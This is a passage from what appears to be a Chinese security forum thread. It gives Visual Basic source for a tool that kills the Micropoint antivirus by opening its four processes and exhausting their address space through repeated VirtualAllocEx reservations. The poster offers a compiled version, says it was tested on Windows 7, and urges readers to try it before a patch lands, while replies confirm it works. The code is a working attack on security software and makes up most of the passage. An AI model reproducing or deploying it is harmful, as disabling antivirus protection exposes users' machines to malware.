'Call StartAllocMP3
' Call StartAllocMP4
Else
MsgBox ("One of the four processes of the MP AutiVirus have not been opened !!!")
End If
End Function
Function StartAllocMP1()
AllocMemSizeOne = 50000000
AllocMemSizeTwo = 5000000
AllocMemSizeThree = 2500000
AllocMemSizeFour = 1000000
AllocMemSizeFive = 500000
AllocMemSizeSix = 250000
AllocMemSizeSeven = 100000
AllocMemSizeEight = 50000
AllocMemSizeNine = 500
Do
AllocMP1 = VirtualAllocEx(hMP1, 0, AllocMemSizeOne, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP1 > 0
Do
AllocMP1 = VirtualAllocEx(hMP1, 0, AllocMemSizeTwo, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP1 > 0
Do
AllocMP1 = VirtualAllocEx(hMP1, 0, AllocMemSizeThree, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP1 > 0
Do
AllocMP1 = VirtualAllocEx(hMP1, 0, AllocMemSizeFour, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP1 > 0
Do
AllocMP1 = VirtualAllocEx(hMP1, 0, AllocMemSizeFive, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP1 > 0
Do
AllocMP1 = VirtualAllocEx(hMP1, 0, AllocMemSizeSix, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP1 > 0
Do
AllocMP1 = VirtualAllocEx(hMP1, 0, AllocMemSizeSeven, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP1 > 0
Do
AllocMP1 = VirtualAllocEx(hMP1, 0, AllocMemSizeEigth, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP1 > 0
Do
AllocMP1 = VirtualAllocEx(hMP1, 0, AllocMemSizeNine, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP1 > 0
MsgBox ("MPMon.EXE has been Alloc !!")
End Function
Function StartAllocMP2()
AllocMemSizeOne = 50000000
AllocMemSizeTwo = 5000000
AllocMemSizeThree = 2500000
AllocMemSizeFour = 1000000
AllocMemSizeFive = 500000
AllocMemSizeSix = 250000
AllocMemSizeSeven = 100000
AllocMemSizeEight = 50000
AllocMemSizeNine = 500
Do
AllocMP2 = VirtualAllocEx(hMP2, 0, AllocMemSizeOne, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP2 > 0
Do
AllocMP2 = VirtualAllocEx(hMP2, 0, AllocMemSizeTwo, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP2 > 0
Do
AllocMP2 = VirtualAllocEx(hMP2, 0, AllocMemSizeThree, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP2 > 0
Do
AllocMP2 = VirtualAllocEx(hMP2, 0, AllocMemSizeFour, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP2 > 0
Do
AllocMP2 = VirtualAllocEx(hMP2, 0, AllocMemSizeFive, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP2 > 0
Do
AllocMP2 = VirtualAllocEx(hMP2, 0, AllocMemSizeSix, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP2 > 0
Do
AllocMP2 = VirtualAllocEx(hMP2, 0, AllocMemSizeSeven, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP2 > 0
Do
AllocMP2 = VirtualAllocEx(hMP2, 0, AllocMemSizeEigth, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP2 > 0
Do
AllocMP2 = VirtualAllocEx(hMP2, 0, AllocMemSizeNine, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP2 > 0
MsgBox ("MPSVC.EXE has been Alloc !!")
End Function
Function StartAllocMP3()
AllocMemSizeOne = 50000000
AllocMemSizeTwo = 5000000
AllocMemSizeThree = 2500000
AllocMemSizeFour = 1000000
AllocMemSizeFive = 500000
AllocMemSizeSix = 250000
AllocMemSizeSeven = 100000
AllocMemSizeEight = 50000
AllocMemSizeNine = 500
Do
AllocMP3 = VirtualAllocEx(hMP3, 0, AllocMemSizeOne, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP3 > 0
Do
AllocMP3 = VirtualAllocEx(hMP3, 0, AllocMemSizeTwo, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP3 > 0
Do
AllocMP3 = VirtualAllocEx(hMP3, 0, AllocMemSizeThree, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP3 > 0
Do
AllocMP3 = VirtualAllocEx(hMP3, 0, AllocMemSizeFour, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP3 > 0
Do
AllocMP3 = VirtualAllocEx(hMP3, 0, AllocMemSizeFive, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP3 > 0
Do
AllocMP3 = VirtualAllocEx(hMP3, 0, AllocMemSizeSix, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP3 > 0
Do
AllocMP3 = VirtualAllocEx(hMP3, 0, AllocMemSizeSeven, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP3 > 0
Do
AllocMP3 = VirtualAllocEx(hMP3, 0, AllocMemSizeEigth, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP3 > 0
Do
AllocMP3 = VirtualAllocEx(hMP3, 0, AllocMemSizeNine, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP3 > 0
MsgBox ("MPSVC1.EXE has been Alloc !!")
End Function
Function StartAllocMP4()
AllocMemSizeOne = 50000000
AllocMemSizeTwo = 5000000
AllocMemSizeThree = 2500000
AllocMemSizeFour = 1000000
AllocMemSizeFive = 500000
AllocMemSizeSix = 250000
AllocMemSizeSeven = 100000
AllocMemSizeEight = 50000
AllocMemSizeNine = 500
Do
AllocMP4 = VirtualAllocEx(hMP4, 0, AllocMemSizeOne, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP4 > 0
Do
AllocMP4 = VirtualAllocEx(hMP4, 0, AllocMemSizeTwo, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP4 > 0
Do
AllocMP4 = VirtualAllocEx(hMP4, 0, AllocMemSizeThree, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP4 > 0
Do
AllocMP4 = VirtualAllocEx(hMP4, 0, AllocMemSizeFour, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP4 > 0
Do
AllocMP4 = VirtualAllocEx(hMP4, 0, AllocMemSizeFive, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP4 > 0
Do
AllocMP4 = VirtualAllocEx(hMP4, 0, AllocMemSizeSix, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP4 > 0
Do
AllocMP4 = VirtualAllocEx(hMP4, 0, AllocMemSizeSeven, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP4 > 0
Do
AllocMP4 = VirtualAllocEx(hMP4, 0, AllocMemSizeEigth, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP4 > 0
Do
AllocMP4 = VirtualAllocEx(hMP4, 0, AllocMemSizeNine, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP4 > 0
MsgBox ("MPSVC2.EXE has been Alloc !!")
End Function
附件里就是编译好的 微点专杀工具 在window 7下测试通过
需要注意的是,运行之后需要稍等一会,你可以去泡杯咖啡。
好了 早上5点了,晕 还要上班 ,怎么办
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
|
|
|---|---|
|
|
3,试图用openprocess打开微点进程,OK,特权级提升之后可以全部打开
4,试图用VirtualAllocEx划分一个地址空间看看,哈哈 令人兴奋的是居然成功 这个....是真的吗??????? 
|
|
|
8月24号做的测试
可能人家微点很有自信 |
|
|
|
|
|
完全看不懂啊
|
|
|
汗了。。竟然真的被干掉了。。
|
|
|
我狂汗了。。。对主动也有影响的。。。
 
|
|
|
在win XP 下 其实效果并不是很明显。要等很久才能结束掉微点4个进程
不过在我win 7下 效果很不错 [ATTACH][ATTACH][ATTACH][ATTACH]  [/ATTACH][/ATTACH][/ATTACH][/ATTACH]    |
|
|
|
|
|
不猥琐 不行喽 现在ring3日子难混滴
对了 此漏洞我已经告知微点,如果大家想测试,那么赶紧。好像预升级版已经补上这个漏洞了 学这些技术,就是为了好玩 其他不图啥 |
|
|
 感谢看雪 我获得邀请码
|
